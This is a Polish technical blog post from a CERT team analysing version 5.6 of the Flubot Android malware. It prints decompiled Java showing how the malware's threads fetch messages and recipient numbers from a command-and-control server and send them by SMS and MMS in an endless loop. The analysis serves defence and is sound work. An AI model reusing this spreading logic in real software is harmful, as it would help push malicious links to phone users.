hamburger

(jeśli zgłaszasz przypadek phishingu, zapisz mail (przesuń go z programu pocztowego na pulpit komputera lub wybierz opcję plik/zapisz jako), a następnie załącz)

Podejrzany SMS prześlij na nr 508 700 900

Jeśli zgłoszenie dotyczy bezpieczeństwa dzieci, zgłoś je również pod http://www.dyzurnet.pl
@CERT_OPL

Flubot wersja 5.6 – teraz wysyła również MMSy (tekst techniczny)

Przyjrzeliśmy się nowej (5.6) wersji Flubota. W niej po raz pierwszy wiadomości z linkami do złośliwej aplikacji dystrybuoowane są zarówno przez SMSy jak i MMSy.

W jaki sposób to się dzieje? Aplikacja wywołuje 2 wątki:

 public static void d(Context _context) {
        if (a == null) {
            a = _context;
            for (int h = 0; h < 2; h++) {
                Thread thread = new Thread(new SendSMSMMS(h));

               thread.start();
            }
        }
}

W pierwszym parametrze przekazywana jest wartość 0, następnie zaś, w drugim wywołaniu pętli 1. Klasa StartSMSMMS definiuje tworzony wątek w kodzie powyżej

public class SendSMSMMS implements Runnable {
public SendSMSMMS(int i) {
        this.b = i;
    }
public void run() {
        int rate;
        boolean isSms = this.b == 0;
        rate = SMSMMSClass.GET_RATE(isSms);
        int i = 0;
        while (true) {
            if (i * rate > 600) {
                rate = SMSMMSClass.GET_RATE(isSms);
                i = 0;
            }
            CountDownLatch done = new CountDownLatch(1);
            if (isSms) {
                SMSMMSClass.GET_SEND_SMS(done);
            } else {
                SMSMMSClass.GET_SEND_MMS(done);
            }
            try {
                done.await(rate * 3, TimeUnit.SECONDS);
            } catch (Exception e) {
            }
            p297956ea.sleep(rate); //Sleep

            i++;
        }
    }
}

Konstruktor nadaje zmiennej b klasy SendSMSMMS wartość z przekazanego parametru, tj. 0 lub 1. W metodzie run, która zostanie wywołana podczas tworzenia wątku, w zależności od wartości zmiennej isSms wysyłany będzie:

  • SMS jeśli zmienna będzie równa true
  • MMS (false)

Dla obu opcji najpierw zostanie ustalona częstotliość (rate) z jaką aplikacja ma odpytywać serwer command&control o nową wiadomość do wysłania. Następnie w nieskończonej pętli realizowane będzie wysyłanie SMS lub MMS. Metody GET_SEND_SMS oraz GET_SEND_MMS, pobierają nową wiadomość, wraz z numerem odbiorczym z serwera c2, a następnie ją wysyłają. Po wysłaniu wiadomości wątek usypia na ilość sekund zdefiniowaną w zmiennej rate, po czym cały cykl sie powtarza, z wyjątkiem sytuacji gdy iloczyn zmiennych i oraz rate będzie większy od 600. Wtedy dodatkowo zostanie zaktualizowana częstotliwość odpytywania o nową  wiadomość.


Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Zobacz także

Komunikat dotyczący plików cookies

Ta witryna używa plików cookies (małych plików tekstowych, przechowywanych na Twoim urządzeniu). Są one stosowane dla zapewnienia prawidłowego działania strony oraz do zbierania informacji o Twoich preferencjach i nawykach użytkowania witryny.

Pliki cookies niezbędne do działania strony używamy do zapewnienia podstawowych funkcji, takich jak logowanie oraz zapewnienie bezpieczeństwa witrynie. Ich wykorzystanie nie wymaga Twojej zgody.

Pliki cookies funkcyjne. Pozwalają nam zbierać informacje na temat zalogowanych sesji oraz przechowywać dane wpisane przez Ciebie w formularzach znajdujących się na stronie takich jak: czas trwania zalogowanej sesji , nazwę użytkownika.

Pozostałe kategorie wykorzystywania plików cookies, które wymagają Twojej zgody na używanie

Pliki cookies statystyczne/analityczne. Pozwalają nam zbierać anonimowe informacje o ruchu na stronie (liczba odwiedzin, źródło ruchu i czas spędzony na witrynie). Te dane pomagają nam zrozumieć, jak nasi użytkownicy korzystają z witryny i poprawiają jej działanie.

Możesz zmienić swoje preferencje dotyczące plików cookies w każdej chwili. W celu zarządzania plikami cookies lub wycofania zgody na ich używanie, prosimy skorzystać z ustawień przeglądarki internetowej.